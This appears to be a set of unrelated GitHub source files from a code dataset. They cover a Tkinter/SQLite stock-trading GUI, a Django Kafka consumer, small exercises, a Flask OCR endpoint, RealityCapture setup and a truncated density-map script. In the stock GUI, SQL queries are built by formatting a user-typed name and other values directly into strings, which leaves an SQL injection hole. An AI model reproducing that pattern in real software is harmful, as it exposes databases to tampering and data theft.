VALUES('12/12/2012',2,3.4,2,1)\"\r\n sql = \"INSERT INTO trans(date,qty,price,stock_id,people_id) VALUES('12/12/2012',2,3.4,1,2)\"\r\n c.execute(sql)\r\n \r\n# save and commit\r\nconn.commit()\r\n\r\n# read back the test data to the terminal\r\nc.execute(\"SELECT id,company,qty,price from stocks\")\r\nfor row in c:\r\n print(row)\r\nc.execute(\"SELECT * from people\")\r\nfor row in c:\r\n print(row)\r\nc.execute(\"SELECT * from trans\")\r\nfor row in c:\r\n print(row)\r\nc.execute('''SELECT people.name, stocks.company FROM people\r\n JOIN trans ON trans.people_id = people.id\r\n JOIN stocks ON stocks.id = trans.stock_id''')\r\nfor row in c:\r\n print(row)\r\n\r\ndef get_transactions(name):\r\n if name==\"name\" or name==\"\":\r\n where_clause = \"\"\r\n else:\r\n where_clause = f\"WHERE people.name = '{name}'\"\r\n \r\n data = \"Transactions are:\"\r\n sql = f'''SELECT people.name, trans.qty, trans.price, trans.date, stocks.company FROM people\r\n JOIN trans ON trans.people_id = people.id\r\n JOIN stocks ON stocks.id = trans.stock_id {where_clause} '''\r\n print(sql)\r\n c.execute(sql)\r\n for row in c:\r\n data = data + \"\\n\" + str(row)\r\n return data\r\n\r\ndef get_companies():\r\n sql = \"SELECT company,id FROM stocks\"\r\n companies=[]\r\n c.execute(sql)\r\n for row in c:\r\n companies.append(row[0])\r\n companies.append(row[1])\r\n print(companies)\r\n return dict(companies[i:i+2] for i in range(0, len(companies), 2))\r\n\r\ndef get_people():\r\n sql = \"SELECT name,id FROM people\"\r\n people=[]\r\n c.execute(sql)\r\n for row in c:\r\n people.append(row[0])\r\n people.append(row[1])\r\n print(people)\r\n return dict(people[i:i+2] for i in range(0, len(people), 2))\r\n\r\ndef insert_trans(person_id, stock_id, price, qty):\r\n today = datetime.datetime.now()\r\n sql = f\"INSERT into trans (date,qty,price,stock_id,people_id) VALUES('{today}',{qty},{price},{stock_id},{person_id})\"\r\n print(sql)\r\n c.execute(sql)\r\n conn.commit()\r\n \r\n# define the gui\r\nclass trader_gui:\r\n def __init__(self, master):\r\n self.w = Label(master, text=\"Stock transactions\")\r\n self.w.pack()\r\n\r\n view_frame = Frame(master, bg='lavender')\r\n view_frame.pack() #fill=BOTH, expand=True\r\n self.label1 = Label (view_frame, text =(\"Filter by name:\"))\r\n self.label1.pack(side=\"left\")\r\n self.name = StringVar()\r\n self.name.set(\"name\")\r\n self.e_name = Entry (view_frame, textvariable=self.name)\r\n self.e_name.pack(side=\"left\")\r\n self.b_view = Button(view_frame, text = \"View transactions\", command=lambda:self.unpack_gui())\r\n self.b_view.pack(side=\"left\")\r\n \r\n data_frame = Frame(master, bg='grey')\r\n data_frame.pack()\r\n self.t = Text(data_frame)\r\n self.t.pack()\r\n self.t.delete(1.0,END)\r\n self.t.insert(END, get_transactions(self.name.get()))\r\n\r\n trans_frame = Frame(master, bg='green')\r\n trans_frame.pack(fill=BOTH, expand=True)\r\n self.b_add = Button(trans_frame, text = \"New transaction\", command=lambda:self.new_trans())\r\n self.b_add.pack(side=\"right\")\r\n # company list\r\n self.company = StringVar(trans_frame)\r\n self.company.trace(\"w\",self.company_chosen)\r\n self.companies = get_companies()\r\n print(self.companies)\r\n self.company.set(next(iter(self.companies)))\r\n self.compMenu = OptionMenu(trans_frame, self.company, *self.companies)\r\n self.compMenu.pack(side=\"left\")\r\n # current_stock_price\r\n self.price = DoubleVar(trans_frame)\r\n self.pl = Label(trans_frame, textvariable=self.price)\r\n self.pl.pack(side=\"left\")\r\n # person list\r\n 
self.person = StringVar(trans_frame)\r\n self.person.trace(\"w\",self.person_chosen)\r\n self.people = get_people()\r\n print(self.people)\r\n self.person.set(next(iter(self.people)))\r\n self.persMenu = OptionMenu(trans_frame, self.person, *self.people)\r\n self.persMenu.pack(side=\"left\")\r\n # get current stock price\r\n self.company_chosen()\r\n\r\n def unpack_gui(self):\r\n self.t.delete(1.0,END)\r\n self.t.insert(END, get_transactions(self.name.get()))\r\n\r\n def new_trans(self):\r\n # insert_trans(person_id, stock_id)\r\n insert_trans(self.people[self.person.get()], self.companies[self.company.get()], self.price.get(), 10)\r\n\r\n # Called if company changes - get current stock price\r\n def company_chosen(self, *args):\r\n stock_id = self.companies[self.company.get()]\r\n sql = f\"SELECT price from stocks where id = {stock_id}\"\r\n print(sql)\r\n c.execute(sql)\r\n self.price.set(c.fetchone()[0])\r\n \r\n # Called if person changes - for debug not for functionality\r\n def person_chosen(self, *args):\r\n print(\"Person id is\",self.people[self.person.get()])\r\n\r\n \r\n \r\n# window setup\r\nwindow1 = Tk()\r\nwindow1.geometry(\"500x600\")\r\nwindow1.title(\"Window for GUI\")\r\n# launch the gui\r\napp1 = trader_gui(window1)\r\nwindow1.mainloop()\r\n\r\n# close the connection\r\ninput(\"Press enter to close\")\r\nconn.close()\r\n","repo_name":"catchpolej/python_databases","sub_path":"linked_tables_trial.py","file_name":"linked_tables_trial.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5359396417","text":"import json, os, django\nfrom confluent_kafka import Consumer\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"core.settings\")\ndjango.setup()\n\nfrom django.apps import apps\n\nContact = apps.get_model('automation', 'Contact')\nEmailList = apps.get_model('automation', 'EmailList')\nContactEmailList = apps.get_model('automation', 'ContactEmailList')\nEmailTemplate = apps.get_model('automation', 'EmailTemplate')\nEmailCampaign = apps.get_model('automation', 'EmailCampaign')\nSegment = apps.get_model('automation', 'Segment')\nTag = apps.get_model('automation', 'Tag')\n\nconsumer1 = Consumer({\n 'bootstrap.servers': os.environ.get('KAFKA_BOOTSTRAP_SERVER'),\n 'security.protocol': os.environ.get('KAFKA_SECURITY_PROTOCOL'),\n 'sasl.username': os.environ.get('KAFKA_USERNAME'), \n 'sasl.password': os.environ.get('KAFKA_PASSWORD'),\n 'sasl.mechanism': 'PLAIN',\n 'group.id': os.environ.get('KAFKA_GROUP'),\n 'auto.offset.reset': 'earliest'\n})\nconsumer1.subscribe([os.environ.get('KAFKA_TOPIC')])\n\nwhile True:\n msg1 = consumer1.poll(1.0)\n\n if msg1 is not None and not msg1.error():\n topic1 = msg1.topic()\n value1 = msg1.value()\n\n if topic1 == os.environ.get('KAFKA_TOPIC'):\n if msg1.key() == b'user_agreed':\n user_data = json.loads(value1)\n\n # Create a new Contact entry\n contact, created = Contact.objects.get_or_create(\n email=user_data['email'],\n defaults={\n 'first_name': user_data.get('first_name', ''),\n 'last_name': user_data.get('last_name', '')\n }\n )\n\n if created:\n # Add the new contact to the specified EmailList\n email_list = EmailList.objects.get(pk=1)\n contact_email_list = ContactEmailList(contact=contact, email_list=email_list)\n contact_email_list.save()\n\n # Create or get the desired Tag\n tag, created = Tag.objects.get_or_create(\n name='new_user', # Replace 'new_user' with the desired Tag name\n defaults={'description': 'New users who 
agreed to receive marketing emails'}\n                    )\n\n                    # Add the Tag to the Contact\n                    contact.tags.add(tag)\n\n                    # Create or get the desired Segment\n                    segment, created = Segment.objects.get_or_create(\n                        name='new_users_segment', # Replace 'new_users_segment' with the desired Segment name\n                        defaults={\n                            'description': 'Segment of new users who agreed to receive marketing emails',\n                            'email_list': email_list\n                        }\n                    )\n\n                    # Add the Tag to the Segment\n                    segment.tags.add(tag)\n\nconsumer1.close()","repo_name":"boomslag/email_microservice","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30730150431","text":"import math\r\nx = float(input(\"Введіть значення x: \"))\r\ny = 0.0\r\nif x>=7.2:\r\n    y = math.log(4, math.fabs(x+1))\r\n    print(y)\r\nelif x>5.11:\r\n    y = (math.log2(math.fabs(math.cos(x))))**(1./2.)\r\n    print(y)\r\nelse:\r\n    y = math.pow(x,2)+4*math.fabs(x-4)+math.e**x\r\n    print(y)\r\n\r\n\r\n","repo_name":"Nikita2707/VKN-1","sub_path":"Лаб 5, Варіант 8.py","file_name":"Лаб 5, Варіант 8.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23570104796","text":"class shopping:\n    def __init__(self, name):\n        self.name = name\n        self.cart = []\n\n    def add_to_cart(self, item, price, quantity):\n        product = {'product_name':item, 'price':price, 'quantity':quantity}\n        self.cart.append(product)\n\n    \n    #home work for removing item from the list\n    def remove_item(self, item):\n        # rebuild the cart without the matching product; calling\n        # self.cart.remove() while iterating over self.cart skips entries\n        self.cart = [p for p in self.cart if p['product_name'] != item]\n    \n\n    def checkout(self, amount):\n        total = 0\n        for item in self.cart:\n            print(item)\n            total += item['price'] * item['quantity']\n        print('total price', total)\n        if amount < total:\n            print(f'please provide also {total - amount} more.')\n        else:\n            extra = amount - total\n            print(f'here is your items and extra money {extra}')\n        \n\nmyself = shopping('ariful islam')\nmyself.add_to_cart('alu', 40, 2)\nmyself.add_to_cart('dal', 50, 5)\nprint(myself.cart)\nmyself.checkout(500)\nmyself.checkout(300)\nmyself.remove_item('alu')\nans = myself.cart\nprint(ans)\n","repo_name":"Arif-462/python_cousrse","sub_path":"Week 2 OOP/Module 05 Class and object/5.6_shopping.py","file_name":"5.6_shopping.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813032874","text":"t = int(input())\nfor a in range(t):\n    n, x = map(int,input().split())\n    A = [int(i) for i in input().split()]\n    B = [int(i) for i in input().split()]\n    A.sort()\n    B.sort(reverse=True)\n    ans = True\n    for i in range(n):\n        if A[i]+B[i]<=x:\n            continue\n        else:\n            ans=False\n            break\n    if ans ==True:\n        print('Yes')\n    else:\n        print('No')\n    if a!=t-1:\n        blank=input()\n\n","repo_name":"JannaKim/PS","sub_path":"codeforces/Arrat_re.py","file_name":"Arrat_re.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11091377720","text":"\"\"\"\nКласс, связывающий работу Модели и Вида. 
В нём определён метод, запускающий\nприложение.\n\"\"\"\nimport re\n\n\nclass Presenter:\n def __init__(self, view, model):\n self.view = view\n self.model = model\n\n # Запуск приложения\n def run(self):\n is_continue = True\n while is_continue:\n self.view.output('Введите действие: \\n'\n 'create - создание заметки\\n'\n 'read - чтение заметок\\n'\n 'update - изменение заметки\\n'\n 'delete - удаление заметки\\n'\n 'exit - выход')\n request = self.view.input()\n if request == 'exit':\n is_continue = False\n elif request == 'create':\n self.view.output('Введите заголовок заметки: ')\n header = self.view.input()\n self.view.output('Введите тело заметки: ')\n body = self.view.input()\n if header == \"\" and body == \"\":\n self.view.output('Вы ничего не ввели. '\n 'Заметка не была создана')\n else:\n self.model.create(header, body)\n self.view.output('Заметка успешно сохранена')\n elif request == 'read':\n self.view.output('Введите:\\n'\n 'all - для вывода всех заметок\\n'\n 'дату в формате \"дд мм гггг\" - для '\n 'выборки заметок по дате')\n user_date = self.view.input()\n if user_date == 'all':\n list_notes = self.model.read_all()\n self.view.print_notes(list_notes)\n elif re.match(r'^\\d{2}\\s\\d{2}\\s\\d{4}$', user_date):\n list_notes = self.model.read(user_date)\n self.view.print_notes(list_notes)\n else:\n self.view.output(f'Нераспознанная команда \"{user_date}\" '\n 'Повторите ввод')\n elif request == 'update':\n self.view.output('Укажите id изменяемой заметки: ')\n user_input = self.view.input()\n try:\n number = int(user_input)\n except ValueError:\n self.view.output(f'Вы ввели \"{user_input}\", что не '\n f'является числом. Повторите ввод')\n continue\n self.view.output('Введите новый заголовок и нажмите '\n 'клавишу Enter, если хотите его '\n 'изменить. Иначе - просто нажмите '\n 'клавишу Enter: ')\n new_header = self.view.input()\n self.view.output('Введите новое тело заметки и нажмите'\n ' клавишу Enter, если хотите его '\n 'изменить. Иначе - просто нажмите '\n 'клавишу Enter: ')\n new_body = self.view.input()\n if new_header == \"\" and new_body == \"\":\n self.view.output('Вы ничего не ввели. '\n 'Заметка не была изменена')\n else:\n info_update = self.model.update(number, new_header,\n new_body)\n self.view.output(info_update)\n elif request == 'delete':\n self.view.output('Укажите id удаляемой заметки: ')\n user_input = self.view.input()\n try:\n number = int(user_input)\n except ValueError:\n self.view.output(f'Вы ввели \"{user_input}\", что не '\n f'является числом. 
Повторите ввод')\n continue\n info_delete = self.model.delete(number)\n self.view.output(info_delete)\n else:\n self.view.output(f'Нераспознанная команда \"{request}\" '\n 'Повторите ввод')\n","repo_name":"NikitaaaGudkov/Intermediate_control_work","sub_path":"task_1/presenters/Presenter.py","file_name":"Presenter.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19493019569","text":"from fastapi import APIRouter, HTTPException\nfrom typing import List\nfrom pydantic import BaseModel\n\nfrom ..alchemy.brew import brew_potion\nfrom ..alchemy.base import validate\n\n\nroute = APIRouter()\n\n\nclass PotionBrew(BaseModel):\n materials: List[str]\n technic: str\n\n\n@route.post(\"/brew\")\ndef api_set_potion(ingredients: PotionBrew):\n try:\n validate(ingredients.materials, ingredients.technic)\n return brew_potion(ingredients.materials, ingredients.technic)\n except ValueError as e:\n raise HTTPException(status_code=400, detail=str(e))\n except (KeyError, IndexError) as e:\n raise HTTPException(status_code=404, detail=str(e))\n","repo_name":"uriahrokach/LibraAlchemy","sub_path":"backend/src/app/server/api/brew.py","file_name":"brew.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3483210191","text":"# automation has saved my sanity, thanks izik1 for the documentation\nimport requests\nimport json\nimport re\n\nld_r16_u16 = re.compile(\"LD (..),u16$\")\nld_r16_r8 = re.compile(\"LD \\((..)\\),(.)$\")\ninc_r16 = re.compile(\"INC (..)$\")\ninc_r8 = re.compile(\"INC (.)$\")\ndec_r16 = re.compile(\"DEC (..)$\")\ndec_r8 = re.compile(\"DEC (.)$\")\nld_r8_u8 = re.compile(\"LD (.),u8$\")\nrlc = re.compile(\"RLC(.)$\")\nld_r8_r8 = re.compile(\"LD (.),\\(?(..|.)\\)?$\")\nadd_a_r8 = re.compile(\"ADD A,\\(?(..|.)\\)?$\")\naddc_a_r8 = re.compile(\"ADC A,\\(?(..|.)\\)?$\")\nsub_a_r8 = re.compile(\"SUB A,\\(?(..|.)\\)?$\")\nsubc_a_r8 = re.compile(\"SBC A,\\(?(..|.)\\)?$\")\nand_a_r8 = re.compile(\"AND A,\\(?(..|.)\\)?$\")\nxor_a_r8 = re.compile(\"XOR A,\\(?(..|.)\\)?$\")\nor_a_r8 = re.compile(\"OR A,\\(?(..|.)\\)?$\")\ncp_a_r8 = re.compile(\"CP A,\\(?(..|.)\\)?$\")\nretc = re.compile(\"RET (..|.)\")\ndef parseOp(op):\n out = \"\"\n if ld_r16_u16.match(op):\n reg = ld_r16_u16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r16_u16(Register.\" + reg + \")}\"\n elif ld_r16_r8.match(op):\n reg1, reg2 = ld_r16_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r16_r8(Register.\" + reg1 + \", Register.\" + reg2 + \")}\"\n elif inc_r16.match(op):\n reg = inc_r16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.inc_r16(Register.\" + reg + \")}\"\n elif inc_r8.match(op):\n reg = inc_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.inc_r8(Register.\" + reg + \")}\"\n elif dec_r16.match(op):\n reg = dec_r16.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.dec_r16(Register.\" + reg + \")}\"\n elif dec_r8.match(op):\n reg = dec_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.dec_r8(Register.\" + reg + \")}\"\n elif ld_r8_u8.match(op):\n reg = ld_r8_u8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r8_u8(Register.\" + reg + \")}\"\n elif rlc.match(op):\n reg = rlc.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.rlc(Register.\" + reg + \")}\"\n elif ld_r8_r8.match(op):\n dest, src = ld_r8_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.ld_r8_r8(Register.\" + dest + \", Register.\" + src + \")}\"\n elif add_a_r8.match(op):\n reg = add_a_r8.findall(op)[0]\n 
out = \"{cpu: Cpu -> cpu.add_a_r8(Register.\" + reg + \")}\"\n elif addc_a_r8.match(op):\n reg = addc_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.addc_a_r8(Register.\" + reg + \")}\"\n elif sub_a_r8.match(op):\n reg = sub_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.sub_a_r8(Register.\" + reg + \")}\"\n elif subc_a_r8.match(op):\n reg = subc_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.subc_a_r8(Register.\" + reg + \")}\"\n elif and_a_r8.match(op):\n reg = and_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.and_a_r8(Register.\" + reg + \")}\"\n elif xor_a_r8.match(op):\n reg = xor_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.xor_a_r8(Register.\" + reg + \")}\"\n elif or_a_r8.match(op):\n reg = or_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.or_a_r8(Register.\" + reg + \")}\"\n elif cp_a_r8.match(op):\n reg = cp_a_r8.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.cp_a_r8(Register.\" + reg + \")}\"\n elif retc.match(op):\n reg = retc.findall(op)[0]\n out = \"{cpu: Cpu -> cpu.retc(Condition.\" + reg + \")}\"\n else:\n out = \"{cpu: Cpu -> }\"\n return out\n\n# r = requests.get(\"https://izik1.github.io/gbops/table/dmgops.json\")\n# open(\"ops.json\", \"r\").write(r.text)\n# json = r.json()\njson = json.loads(open(\"ops.json\",\"r\").read())\ntemplate = \"op[{}] = Opcode(\\\"{}\\\", {}, {}) {}\"\nout = []\nfor i, k in enumerate(json[\"Unprefixed\"]):\n code = hex(i)[:2] + hex(i)[2:].upper()\n name = k[\"Name\"]\n length = k[\"Length\"]\n time = k[\"TCyclesBranch\"]\n if(i % 16 == 0):\n out.append(\"\")\n out.append(template.format(code,name,length,time,parseOp(name)))\n\nfor i in out:\n print(i)\n\n","repo_name":"tsheinen/gameboy","sub_path":"utils/gbopmapper.py","file_name":"gbopmapper.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27645196467","text":"\nfrom flask import Flask, request, jsonify, render_template\nfrom flask_cors import CORS\n\nimport paddlehub as hub\nimport cv2\nimport numpy as np\n\napp = Flask(__name__)\nCORS(app)\napp.config['JSON_AS_ASCII'] = False\napp.config['JSONIFY_MIMETYPE'] = \"application/json;charset=utf-8\"\n\n@app.route(\"/ocr\", methods=['GET', 'POST'])\ndef ocr_route():\n if request.method == 'POST':\n buf = request.files['file'].read()\n image = np.frombuffer(buf, np.uint8)\n img = cv2.imdecode(image, 1)\n ocr = hub.Module(name=\"ch_pp-ocrv3\", enable_mkldnn=True)\n results = ocr.recognize_text(images=[img])\n result = results[0]['data']\n\n return jsonify({'result': result})\n else:\n return render_template('upload.html')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"fanlia/paddlehub-docker","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10024351465","text":"from logging import handlers\nimport os, sys\n\nfrom os.path import join as opj\n\nimport logging\nfrom logdecorator import log_on_start, log_on_end\nlog = logging.getLogger(__name__)\n\nimport numpy as np\nimport subprocess\n\n\n# bashCommand = [\"ls\", \"{}/p_p*/wflms/*\".format(self.analysispath), \"|\", \"wc\" ,\"-l\"]\n# process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, text=True, shell=True)\n# output, error = process.communicate()\n# log.info(output)\n\n\nclass analysisreport:\n def __init__(self, reportmodel):\n self.__dict__.update(reportmodel.__dict__)\n\n\n @log_on_start(logging.INFO, 
\"collect_jobs() started\")\n @log_on_end(logging.INFO, \"collect_jobs() finished\")\n def collect_jobs(self):\n jobs = []\n jobs.append(0)\n self.jobs = jobs\n\n\n def count(self, filenames, it):\n wflm_c= 0\n btempl_c = 0\n\n if any(\"p_it{}.npy\".format(it) in filename for filename in filenames):\n wflm_c += 1\n if any(\"btempl_p{:03d}\".format(it) in filename for filename in filenames):\n btempl_c += 1\n\n return np.array([wflm_c, btempl_c])\n \n\n @log_on_start(logging.INFO, \"run() started\")\n @log_on_end(logging.INFO, \"run() finished\")\n def run(self):\n\n log.info(\"status report for {}\".format(self.analysispath))\n for n in range(3):\n log.info(\"==============================================\")\n for n in range(3):\n log.info(\"\")\n\n qlms_dd_ct = 0\n for idx in self.jobs:\n for dirpath, dirnames, filenames in os.walk(self.analysispath):\n for fn in filenames:\n with open(opj(dirpath,fn), 'r', encoding = 'latin1') as f:\n first_line = f.readline(0)\n if dirpath.endswith('qlms_dd'):\n qlms_dd_ct += len([filename for filename in filenames if filename.startswith(\"sim_p_p\")])\n log.info(\"qlms:\")\n log.info('------------------------')\n log.info(\"{}/{} QE phis are there\".format(qlms_dd_ct, self.imax+1))\n \n counts = np.zeros(shape=2, dtype=np.int)\n for idx in self.jobs:\n log.info(\"\")\n log.info(\"Wflms and B-templates:\")\n log.info('------------------------')\n for it in np.arange(0,self.itmax+1):\n counts = np.zeros(shape=2, dtype=np.int)\n for dirpath, dirnames, filenames in os.walk(self.analysispath):\n if dirpath.endswith('wflms'):\n if self.version == '':\n if len(dirpath.split('/')[-2]) == 11:\n counts += self.count(filenames, it)\n else:\n if dirpath.split('/')[-2].endswith(self.version):\n counts += self.count(filenames, it)\n log.info(\"it {}:\".format(it))\n log.info(\"wflm{}: {}/{} \".format(it, counts[0], self.imax+1))\n log.info(\"btempl_p0{}: {}/{}\".format(it, counts[1], self.imax+1))\n\n\n for n in range(3):\n log.info(\"\")\n for n in range(3):\n log.info(\"==============================================\")\n","repo_name":"NextGenCMB/delensalot","sub_path":"delensalot/config/sr.py","file_name":"sr.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"6196215155","text":"\nfrom osgeo import gdal,osr,gdalconst\nimport pandas as pd\nimport numpy as np\nimport os\nimport sys\nimport geopandas as gpd\n\ngdal.UseExceptions()\nsrs=osr.SpatialReference()\nsrs.ImportFromProj4('+proj=lcc +lat_0=0 +lon_0=105 +lat_1=30 +lat_2=62 +x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs +type=crs')\n\n#Convert the habitat loss pixels of area ID 10 in 2000 to tif file format\nID=10\nyear=2000\n\npatchs=gpd.read_file('/root/work/BIO/new_code/data/patchs.shp')\nIDinfo=pd.read_csv('/mnt/d5/GH/work/BIO/fix/code/IDinfo.csv')\ncsv=pd.read_csv(f'/mnt/d5/GH/work/BIO/fix/res/loss/loss_indirect_fix/VU/{ID}_id.csv')\ncsv=csv[csv['year']==year]\n\nrow=int(IDinfo.loc[IDinfo['ID']==ID,'row'])\ncol=int(IDinfo.loc[IDinfo['ID']==ID,'col'])\n\ngeometry=patchs.loc[patchs['ID']==ID,'geometry'].tolist()[0]\nxys=geometry.exterior.coords[:-1]\nxs=[item[0] for item in xys]\nys=[item[1] for item in xys]\nminx=min(xs)\nmaxy=max(ys)\nmaxx=max(xs)\nminy=min(ys)\n\n\nres=np.zeros((row,col))\nfor i,item in csv.iterrows():\n r=int(item['row'])\n c=int(item['col'])\n res[r,c]=item['value']\n\n\ndriver = gdal.GetDriverByName(\"GTiff\") 
\nds=driver.Create(f'/mnt/d5/GH/work/TP/mid/sample.tif',col,row,1,gdal.GDT_Int32,options=['COMPRESS=LZW'])\nband=ds.GetRasterBand(1)\nband.SetNoDataValue(0)\nband.WriteArray(res,0,0)\nds.SetGeoTransform([minx,30,0,maxy,0,-30])\nds.SetProjection(srs.ExportToWkt())\nds=None\n","repo_name":"sjtcwdsj/biodiversity","sub_path":"sample/sample-totif.py","file_name":"sample-totif.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32566478749","text":"import os, time, glob\nimport shutil\nfrom multiprocessing.pool import ThreadPool\n\nfrom app_windows.realityCapture.genericTask import GenericTask\n\n\nbox_rcbox = '''\n\n
\n \n \n\n'''\nDetectMarkersParams_xml = '''\n\n \n \n \n \n \n \n\n'''\nExportRegistrationSettings_xml = '''\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n'''\nXMPSettings_xml = '''\n\n \n \n \n \n \n \n\n'''\ngroundPlaneImport_xml = '''\n\n \n \n \n \n \n \n \n \n \n\n'''\n\n\n\n\nclass PrepareFolder(GenericTask):\n def __init__(self, rc_job):\n super().__init__(rc_job)\n\n def run(self):\n self.set_status(\"active\")\n\n\n if not os.path.exists(self.rc_job.rc_cache_dir):\n os.mkdir(self.rc_job.rc_cache_dir)\n self.log.append(\"Cache directory created %s\" % self.rc_job.rc_cache_dir)\n\n if not os.path.exists(self.rc_job.workingdir):\n os.mkdir(self.rc_job.workingdir)\n self.log.append(\"Cache directory created %s\" % self.rc_job.workingdir)\n else:\n self.log.append(\"Cache found at %s\" % self.rc_job.workingdir)\n\n with open(os.path.join(self.rc_job.workingdir, \"last_usage\"), \"w\") as f:\n f.write(\"%s\" % int(time.time()))\n\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"tmp\")):\n os.mkdir(os.path.join(self.rc_job.workingdir, \"tmp\"))\n if not os.path.exists(os.path.join(self.rc_job.workingdir, self.rc_job.export_foldername)):\n os.mkdir(os.path.join(self.rc_job.workingdir, self.rc_job.export_foldername))\n\n with open(self.get_path(\"DetectMarkersParams.xml\"), \"w\") as f:\n f.write(DetectMarkersParams_xml)\n with open(self.get_path(\"box.rcbox\"), \"w\") as f:\n f.write(box_rcbox % (round(self.rc_job.box_dimensions[0], 4), round(self.rc_job.box_dimensions[1], 4), round(self.rc_job.box_dimensions[2], 4), round(self.rc_job.box_dimensions[2]/2, 4)))\n with open(self.get_path(\"exportRegistrationSettings.xml\"), \"w\") as f:\n f.write(ExportRegistrationSettings_xml)\n with open(self.get_path(\"xmp_settings.xml\"), \"w\") as f:\n f.write(XMPSettings_xml)\n with open(self.get_path(\"groundPlaneImport.xml\"), \"w\") as f:\n f.write(groundPlaneImport_xml)\n\n if len(self.rc_job.license_data) > 0:\n with open(self.get_path(\"license.rclicense\"), \"w\") as f:\n f.write(self.rc_job.license_data)\n\n if self.rc_job.source_ip is None:\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"images\")):\n os.mkdir(os.path.join(self.rc_job.workingdir, \"images\"))\n existed_in_cache = True\n for imgtype in [\"normal\", \"projection\"]:\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"images\", imgtype)):\n existed_in_cache = False\n if os.path.exists(os.path.join(self.rc_job.source_dir, \"images\", imgtype)):\n shutil.copytree(os.path.join(self.rc_job.source_dir, \"images\", imgtype), os.path.join(self.rc_job.workingdir, \"images\", imgtype))\n elif os.path.exists(os.path.join(self.rc_job.source_dir, imgtype)):\n shutil.copytree(os.path.join(self.rc_job.source_dir, imgtype), os.path.join(self.rc_job.workingdir, \"images\", imgtype))\n nr_of_images = len(glob.glob(os.path.join(self.rc_job.workingdir, \"images\", \"*\", \"*.jpg\")))\n if nr_of_images == 0:\n self.log.append(\"No images copied from %s, failed\" % self.rc_job.source_dir)\n self.set_status(\"failed\")\n else:\n if existed_in_cache is False:\n self.log.append(\"%s images copied to cache\" % (nr_of_images))\n else:\n self.log.append(\"%s images exist in cache\" % (nr_of_images))\n self.set_status(\"success\")\n else:\n 
self.set_status(\"success\")","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"server/app_windows/realityCapture/prepareFolder.py","file_name":"prepareFolder.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13332263205","text":"import numpy as np\nimport scipy\nimport scipy.spatial\nfrom scipy.spatial import *\nimport scipy.io as io\nfrom scipy.ndimage.filters import gaussian_filter\nimport os\nimport glob\nfrom matplotlib import pyplot as plt\nimport h5py\nimport PIL.Image as Image\nfrom matplotlib import cm as CM\n #User's modules\nfrom dm_generator import *\n\nclass KNN_Gaussian_Kernal_DMGenerator(DensityMapGenerator):\n \n \n\n def generate_densitymap(self,image,pointsList):\n '''\n This code uses k-nearest neighbors; it can take a minute or more to generate a density map for an image with a thousand people.\n\n points: a two-dimension list of pedestrians' annotations with the order [[col,row],[col,row],...].\n image_shape: the shape of the image, same as the shape of the required density map. (row,col). Note that it can not have a channel dimension.\n\n return:\n density: the density map we want. Same shape as the input image but with only one channel.\n\n example:\n points: three pedestrians with annotation:[[163,53],[175,64],[189,74]].\n image_shape: (768,1024) 768 is row and 1024 is column.\n '''\n image_shape=[image.shape[0],image.shape[1]]\n print(\"\\t Shape of current image: \",image_shape,\". Need to generate \",len(pointsList),\" gaussian kernels.\")\n density_map = np.zeros(image_shape, dtype=np.float32)\n ground_truth_count = len(pointsList)\n if ground_truth_count == 0:\n return density_map\n\n leafsize = 2048\n 